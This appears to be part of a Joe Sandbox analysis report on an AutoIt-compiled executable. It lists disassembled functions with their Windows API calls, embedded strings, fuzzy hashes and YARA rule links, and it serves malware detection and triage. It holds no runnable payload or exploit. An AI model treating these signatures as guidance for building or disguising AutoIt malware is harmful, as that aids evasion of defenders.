Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 60386763c505384839165232e003d1aa859205e226b8910a046c2364f9c286eb
Instruction ID: 44607edf8c1c760b0fcca169c22506ab845fc36b6f8e14a1fbf1803dd50a2082
Opcode Fuzzy Hash: 60386763c505384839165232e003d1aa859205e226b8910a046c2364f9c286eb
Instruction Fuzzy Hash: 3541B671008716AADB21EB64DC49BDF7BDCBFC5350F040A1EF185921A1EB70A648C796

Function 0058AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005A07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005A07EC
Part of subcall function 005A07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 005A07F4
Part of subcall function 005A07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005A07FF
Part of subcall function 005A07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005A080A
Part of subcall function 005A07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 005A0812
Part of subcall function 005A07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 005A081A

Part of subcall function 0059FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0058AC6B), ref: 0059FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0058AD08
OleInitialize.OLE32(00000000), ref: 0058AD85
CloseHandle.KERNEL32(00000000), ref: 005C2F56

Strings

sd, xrefs: 0058AB26
\td, xrefs: 0058AB32
<wd, xrefs: 0058AC6B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <wd$\td$sd
API String ID: 1986988660-1471730198
Opcode ID: 8c3d85be8da073b4571250c4223639bfa86769e6c07bc3b3dc12d4c66a3d17f2
Instruction ID: 3390667f6edadccc4880b1cfbcb5fe3f41ab8324be2f8e73694d5ad8f1f2759c
Opcode Fuzzy Hash: 8c3d85be8da073b4571250c4223639bfa86769e6c07bc3b3dc12d4c66a3d17f2
Instruction Fuzzy Hash: 3A81DEB89092418EC789EF39ED486657FE7FB9B314700A96AD419C7372EB305448CF94

Function 005931BF Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 005D032B
GetOpenFileNameW.COMDLG32(?), ref: 005D0375

Part of subcall function 005A0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00592A58,?,00008000), ref: 005A02A4

Part of subcall function 005A09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005A09E4

Strings

AutoIt script files (*.au3, *.a3x), xrefs: 005D0359
Run Script:, xrefs: 005D034A
X, xrefs: 005D0343
au3, xrefs: 005D036E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
API String ID: 3777226403-1954568251
Opcode ID: 6b5a4aab7396c69f3d4cbbd452a7acde72833a339b7cea6aa8bbb03b88c5451e
Instruction ID: 86d7978f6667499663917ba636583c7aa710b9765f6b1f03580e13d416756e3f
Opcode Fuzzy Hash: 6b5a4aab7396c69f3d4cbbd452a7acde72833a339b7cea6aa8bbb03b88c5451e
Instruction Fuzzy Hash: 2521C371A002899BDF41DFD8C849BEE7FF9BF89300F00405AE404A7281DBB45A88DFA1

Function 005950DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00595109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0059512A
ShowWindow.USER32(00000000), ref: 0059513E
ShowWindow.USER32(00000000), ref: 00595147

Strings

AutoIt v3, xrefs: 00595101, 00595106, 00595107
edit, xrefs: 00595124

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: d8a31b8b6cc99e4c47b8296aaa6b0f7f85e7aa1d776158b62fd707b72b67ea8d
Instruction ID: 0074bd4978c13c7471790194d13d7d6bbff3f4269d1ed5c0051d274dd3731014
Opcode Fuzzy Hash: d8a31b8b6cc99e4c47b8296aaa6b0f7f85e7aa1d776158b62fd707b72b67ea8d
Instruction Fuzzy Hash: 8EF03A745442947EFB311B236C08E672E7FD7C7F10F00501AB900A21B0C6F11880CAB0

Function 005E9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00594A8C: _fseek.LIBCMT ref: 00594AA4

Part of subcall function 005E9CF1: _wcscmp.LIBCMT ref: 005E9DE1
Part of subcall function 005E9CF1: _wcscmp.LIBCMT ref: 005E9DF4

_free.LIBCMT ref: 005E9C5F
_free.LIBCMT ref: 005E9C66
_free.LIBCMT ref: 005E9CD1

Part of subcall function 005A2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005A9C54,00000000,005A8D5D,005A59C3), ref: 005A2F99
Part of subcall function 005A2F85: GetLastError.KERNEL32(00000000,?,005A9C54,00000000,005A8D5D,005A59C3), ref: 005A2FAB

_free.LIBCMT ref: 005E9CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 005E9B8F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 74ac57df19b9af3c4f19850cf8da91f5aede0c7d74db9ff95407fcc49061c75e
Instruction ID: 271af81ef1efb33aafa16a45f4876ad0ee068529650fe18fcf274c78745cec86
Opcode Fuzzy Hash: 74ac57df19b9af3c4f19850cf8da91f5aede0c7d74db9ff95407fcc49061c75e
Instruction Fuzzy Hash: DB512BB1904259AFDF289F65DC45AAEBBB9FF88304F10049EB649A3341DB715E80CF58

Function 005A563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005A569B
_memcpy_s.LIBCMT ref: 005A570D
__read_nolock.LIBCMT ref: 005A576B
__filbuf.LIBCMT ref: 005A578E
_memset.LIBCMT ref: 005A57D2

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 3c14bbdc6d52f7c8ed5ba7b605d62764a2ac4744abeca100d6653e58c41bff4b
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: BD519330A00B06DBDB289E79D884E6E7FB5FF52360F648729F825A72D1E7709D509B40

Function 005852B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005852E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0058534A
TranslateMessage.USER32(?), ref: 00585356
DispatchMessageW.USER32(?), ref: 00585360

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 4373e0e08efab89c7b2b0e934c554e27827ae7ae9d8cdae24d34110acf666592
Instruction ID: e8957ca35e776e6eca4b7887d91cbef2bdda533ee556d621cb6c73d8711a7b64
Opcode Fuzzy Hash: 4373e0e08efab89c7b2b0e934c554e27827ae7ae9d8cdae24d34110acf666592
Instruction Fuzzy Hash: 0E31F4305087069AEF30AF649C44BFA3FF9BB02344F14196AE812A61D1FBF5A885D721

Function 0059278A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 005949C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005927AF,?,00000001), ref: 005949F4

_free.LIBCMT ref: 005CFB04
_free.LIBCMT ref: 005CFB4B

Part of subcall function 005929BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00592ADF

Strings

Bad directive syntax error, xrefs: 005CFB33
_5Y, xrefs: 005CF925, 005CF95E, 005CFAE7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error$_5Y
API String ID: 2861923089-528216743
Opcode ID: 455b2a4e923aeb1a66695ac6bca6d0d877103c2c8fff8a00ed5c230cebd3d6ae
Instruction ID: 4c20c2e7d393d4e6e352fe85025a92988cede9e6be718a847afcf05bb24406a2
Opcode Fuzzy Hash: 455b2a4e923aeb1a66695ac6bca6d0d877103c2c8fff8a00ed5c230cebd3d6ae
Instruction Fuzzy Hash: 6B915C7190021AAFCF14EFA4CC55AEDBBB5FF49314F14452AF816AB291DB309A45CB90

Function 00581284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00581275,SwapMouseButtons,00000004,?), ref: 005812A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00581275,SwapMouseButtons,00000004,?), ref: 005812C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00581275,SwapMouseButtons,00000004,?), ref: 005812EB

Strings

Control Panel\Mouse, xrefs: 005812A6

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: c61b7f76f53717aa28460a120bcc9bc0927f7748eedcbd52385dc7c9abafc86c
Instruction ID: 2b209e1f96686db1edc884a9325cc305be77b0699ad2191e9fdd26cbd8d97fad
Opcode Fuzzy Hash: c61b7f76f53717aa28460a120bcc9bc0927f7748eedcbd52385dc7c9abafc86c
Instruction Fuzzy Hash: DC114875510608BFDF209FA5DC84AEEBBBCFF04741F00895AF845E7110D6719E8197A8

Function 00595B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00595B58

Part of subcall function 005956F8: _memset.LIBCMT ref: 00595787
Part of subcall function 005956F8: _wcscpy.LIBCMT ref: 005957DB
Part of subcall function 005956F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005957EB

KillTimer.USER32(?,00000001,?,?), ref: 00595BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00595BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005D0D7C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 3e66071d07141bf9c8ddd6887433c2e8f2561a4d962cd44233dee0cf9389b76c
Instruction ID: d8b45172bc094342eab3737a643a9cfe27a2eccb79dfa59ec5480a3cb21aee9e
Opcode Fuzzy Hash: 3e66071d07141bf9c8ddd6887433c2e8f2561a4d962cd44233dee0cf9389b76c
Instruction Fuzzy Hash: 0E21FC705047849FEB739B68C899BEBBFEDBF01304F04548FE69A56281D3746984CB51

Function 005948B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005948FA

Strings

AU3! ?a, xrefs: 005948F4
EA06, xrefs: 005D08A1

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?a$EA06
API String ID: 4104443479-1383001353
Opcode ID: c54a1ce1013e2fd81ee4e3f56aa55df2684945744e5343fdfde6801a59531d9b
Instruction ID: 781abf6d5982edebef9fada748ce9b0d325b86c11de7c45eeb1644fc9542c084
Opcode Fuzzy Hash: c54a1ce1013e2fd81ee4e3f56aa55df2684945744e5343fdfde6801a59531d9b
Instruction Fuzzy Hash: 74416F31A041585BDF219B688C55FBF7FA6BF85300F544476F882EB386D6208D869BE1

Function 005E9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00594AB2: __fread_nolock.LIBCMT ref: 00594AD0

_wcscmp.LIBCMT ref: 005E9DE1
_wcscmp.LIBCMT ref: 005E9DF4

Strings

FILE, xrefs: 005E9D2D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 6189c3be8af04b37cdf5f0aaeb4edcd1de8c68c71eb52a3e072fc2e05bd3f2b6
Instruction ID: 54a0eb4aa0b5403d077e3d9351df2901eceeca8a70a496c005cb83ffd5d4dd19
Opcode Fuzzy Hash: 6189c3be8af04b37cdf5f0aaeb4edcd1de8c68c71eb52a3e072fc2e05bd3f2b6
Instruction Fuzzy Hash: E241E771A4024ABADF209AA5CC49F9F7FBEFF85710F00446AFA40A7281D6719D058BA4

Function 005A0FE6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005A593C: __FF_MSGBANNER.LIBCMT ref: 005A5953
Part of subcall function 005A593C: __NMSG_WRITE.LIBCMT ref: 005A595A
Part of subcall function 005A593C: RtlAllocateHeap.NTDLL(00FC0000,00000000,00000001,?,00000004,?,?,005A1003,?), ref: 005A597F

std::exception::exception.LIBCMT ref: 005A101C
__CxxThrowException@8.LIBCMT ref: 005A1031

Part of subcall function 005A87CB: RaiseException.KERNEL32(?,?,?,0063CAF8,?,?,?,?,?,005A1036,?,0063CAF8,?,00000001), ref: 005A8820

Strings

bad allocation, xrefs: 005A1011

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: b31201c039a0a4920b36ea4edde6cecfb0203e7d1f6602eadb74f3fdefe86622
Instruction ID: 96f6fa5babf6fdd75d97f9ee1e6af24895dd9416ae6187ffeae5272b2e9574ef
Opcode Fuzzy Hash: b31201c039a0a4920b36ea4edde6cecfb0203e7d1f6602eadb74f3fdefe86622
Instruction Fuzzy Hash: 17F0C87590465EABCB20BE58EC199EE7FACBF03360F104455F914A6291EFB18B80C2E4

Function 005FD1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43724d2026b4080203d01f6c74e842ea157321cd28d4b860dad2c3b4b7a18d90
Instruction ID: eb137e24bb8d08d906e1902e862bc806ef301d102f471d9e149bd8f20027357e
Opcode Fuzzy Hash: 43724d2026b4080203d01f6c74e842ea157321cd28d4b860dad2c3b4b7a18d90
Instruction Fuzzy Hash: 77F136706083069FCB14DF28C484A6ABBE6FF88314F14892EF9999B351D774E945CF92

Function 00591680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005916DB
_memmove.LIBCMT ref: 0059174C
_memmove.LIBCMT ref: 005917B9

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0002dc8586ef8c8dd672b7dbd0f58d0464d7c956d37365b09bad3939c2ac0b34
Instruction ID: 0155569f013689d0989581d43b6ecd98280d697228b18cf9326628b022d11106
Opcode Fuzzy Hash: 0002dc8586ef8c8dd672b7dbd0f58d0464d7c956d37365b09bad3939c2ac0b34
Instruction Fuzzy Hash: C161DD71A00A1AEFDF048F69D880AAE7BB5FF44350F1485A9EC19CF295EB30D960CB55

Function 005959D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005959F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00595A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00595ABB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: bf52b3ff8207e466a86c899712e3cd6c39b60554c262ac99a9b109d9bdfbd7b7
Instruction ID: d1518b4578f6e0b162d10a80fd7d4e1bec0940fb8b4ac62598f9d52ea9020c13
Opcode Fuzzy Hash: bf52b3ff8207e466a86c899712e3cd6c39b60554c262ac99a9b109d9bdfbd7b7
Instruction Fuzzy Hash: 273171B45057018FDB21DF34D88469BBFE8FB49305F000A2EF69A87250E7B1AA54CB96

Function 005A593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 005A5953

Part of subcall function 005AA39B: __NMSG_WRITE.LIBCMT ref: 005AA3C2
Part of subcall function 005AA39B: __NMSG_WRITE.LIBCMT ref: 005AA3CC

__NMSG_WRITE.LIBCMT ref: 005A595A

Part of subcall function 005AA3F8: GetModuleFileNameW.KERNEL32(00000000,006453BA,00000104,00000004,00000001,005A1003), ref: 005AA48A
Part of subcall function 005AA3F8: ___crtMessageBoxW.LIBCMT ref: 005AA538

Part of subcall function 005A32CF: ___crtCorExitProcess.LIBCMT ref: 005A32D5
Part of subcall function 005A32CF: ExitProcess.KERNEL32 ref: 005A32DE

Part of subcall function 005A8D58: __getptd_noexit.LIBCMT ref: 005A8D58

RtlAllocateHeap.NTDLL(00FC0000,00000000,00000001,?,00000004,?,?,005A1003,?), ref: 005A597F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bb5a6fe0f9d5a5001d77969fa14baca4ba0e4141f7e3b27f4c7f04fc1da3aa0d
